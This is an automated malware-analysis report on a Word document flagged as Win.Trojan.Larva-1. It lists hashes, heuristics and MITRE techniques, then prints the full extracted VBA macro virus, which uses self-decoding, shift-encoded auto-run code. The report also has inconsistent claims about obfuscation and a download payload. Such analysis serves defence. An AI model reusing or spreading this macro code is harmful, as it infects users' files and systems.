Win.Trojan.Larva-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 7336faa967bb8f0a…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 39.5 KB
Created: 2001-09-26 18:20:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 07ef57e17055cccb61a3fe8a83004236
SHA-1: cf4075f9e827bcdbeff46f7eed754e6f2d2f9be3
SHA-256: 7336faa967bb8f0a49f5dc8e5e9f8a22bee8d1f13bcc63ead306654922b697bd
Risk score: 220

Malware Insights

Win.Trojan.Larva-1 · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

ClamAV identifies the sample as malicious with multiple signatures, including Win.Trojan.Larva-1 (on the document itself) and Doc.Trojan.Zina-2 (on the extracted macro module). Critical heuristics indicate a Document_Open VBA macro whose compiled p-code stream carries an auto-execution token alongside execution tokens, strongly suggesting it is designed to run malicious code as soon as the document is opened. The VBA source itself is heavily obfuscated, but its structure and the Document_Open auto-execution entry point indicate it is intended to download and execute a secondary payload.

Heuristics (4)

  • ClamAV: Win.Trojan.Larva-1 [severity: critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Win.Trojan.Larva-1
  • VBA macros detected [severity: medium, OLE_VBA_MACROS, 2 related findings]
    The document contains VBA macro code.
  • Document_Open macro [severity: high, OLE_VBA_DOCOPEN]
    The document defines a Document_Open macro, which runs automatically when the document is opened.
  • VBA p-code auto-exec with execution tokens [severity: high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, or documents where source extraction failed, so that visible source is unavailable.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2820 bytes
SHA-256: 06ae3542700f98d5932b17724eae2c84e863eba9e8c9e72b5bd14978c9c327cd
Detection: ClamAV: Doc.Trojan.Zina-2
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open(): On Error Resume Next: Application.ScreenUpdating = False
'Nk%YmnxIthzrjsy%B%Fhyn{jIthzrjsy%Ymjs%Xjy%{}%B%StwrfqYjruqfyj%Jqxj%Xjy%{}%B%Fhyn{jIthzrjsy
'\nym%{}3[GUwtojhy3[GHtrutsjsyx-6.3HtijRtizqj
'%sfoin%B%3Qnsjx-<51%6.
'%{nwzx%B%Xywnslx3Ywnr-YmnxIthzrjsy3[GUwtojhy3[GHtrutsjsyx-6.3HtijRtizqj3Qnsjx-61%d
'%YmnxIthzrjsy3[GUwtojhy3[GHtrutsjsyx-6.3HtijRtizqj3HtzsyTkQnsjx..
'%%Nk%sfion%AC%',Qfw{f'%Ymjs
'%%%3ijqjyjqnsjx%61%3HtzsyTkQnsjx
'%%%3fiikwtrxywnsl%{nwzx
'%%Jsi%Nk
'Jsi%\nym
'Xjy%kx%B%HwjfyjTgojhy-'Xhwnuynsl3KnqjX~xyjrTgojhy'.
'Xjy%iwfo{t{n%B%kx3iwn{jx
'%Ktw%Jfhm%I%Ns%iwfo{t{n
'%%Nk%I3nxwjfi~%Ymjs
'%%%kx3htu~knqj%Fhyn{jIthzrjsy3KzqqSfrj1%I3iwn{jqjyyjw%+%'?a'1%Ywzj
'%%Jsi%Nk
'%Sj}y
'Tujs%'h?a\ns873{gx'%Ktw%Tzyuzy%Fx%(6
'%Uwnsy%(61%'ktw%f%B%6%yt%65'
'%%Uwnsy%(61%'Rxlgt}%''333Pfi%x{j%n lqjif%zrnwj1%tst%xj%zxy{fwn%wfiof''1{gX~xyjrRtifq1''333'''
'%Uwnsy%(61%'sj}y'
'Hqtxj%(6
'X~xyjr3Uwn{fyjUwtknqjXywnsl-''1%'MPJ^dQTHFQdRFHMNSJaXtky|fwjaRnhwtxtkya\nsit|xaHzwwjsy[jwxntsaWzs'1%'P87Xjy'.%B%'h?a\ns873{gx'
'Nk%If~-St|-..%B%<%Ymjs
'%Ithzrjsyx3Fii
'%%\nym%Xjqjhynts
'%%%3Yj}y%B%'PFI%X[J%N_LQJIF%IF%ZRNWJ1%TST%XJ%ZXY[FWN%WFIOF'%d
'%%%%%%%%%+%'%%%\R3Qfw{f%g~%Xujhnj%`Xujhnjx%[nwzx%Qfgxb%%%%'%d
'%%%%%%%%%+%'%%%%%%%%%%%%%%%%%%%7%5%5%6%%%%%%%%%%%%%%%%%%%%'
'%%%3GtqiWzs
'%%%3Xmfinsl3GfhplwtzsiUfyyjwsHtqtw%B%|iHtqtwGqfhp
'%%%3Xmfinsl3KtwjlwtzsiUfyyjwsHtqtw%B%|iHtqtw[ntqjy
'%%%3Htqqfuxj%Inwjhynts?B|iHtqqfuxjXyfwy
'%%Jsi%\nym
'Fhyn{jIthzrjsy3Fhyn{j\nsit|3UwnsyTzy%d
'Wfslj?B|iUwnsyKwtrYt1%Kwtr?B'6'1%Yt?B'65'
'Jsi%Nk
'Fuuqnhfynts3XhwjjsZuifynsl%B%Ywzj
End Sub
Private Sub document_close(): On Error Resume Next
For kd = 2 To 39
 okod = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(kd, 1)
 If Left(okod, 1) = "'" Then
  desni = Right(okod, Len(okod) - 1)
  ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine kd, desni
  For s = 1 To Len(desni)
   vracaj = vracaj & Chr(Asc(Mid(desni, s)) - 5)
   ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine kd, vracaj
  Next
  vracaj = ""
 End If
Next
Document_Open
For T = 2 To 39
 nkod = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(T, 1)
 If Left(nkod, 1) <> "'" Then
  duzina = Len(nkod)
  midl = Mid(nkod, 1, duzina)
  For o = 1 To duzina
   k = Left(midl, o)
   k2 = Chr(Asc(Mid(k, Len(k))) + 5)
   linija = linija & k2
   ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine T, "'" & linija
  Next
  linija = ""
 End If
Next
End Sub
'Larva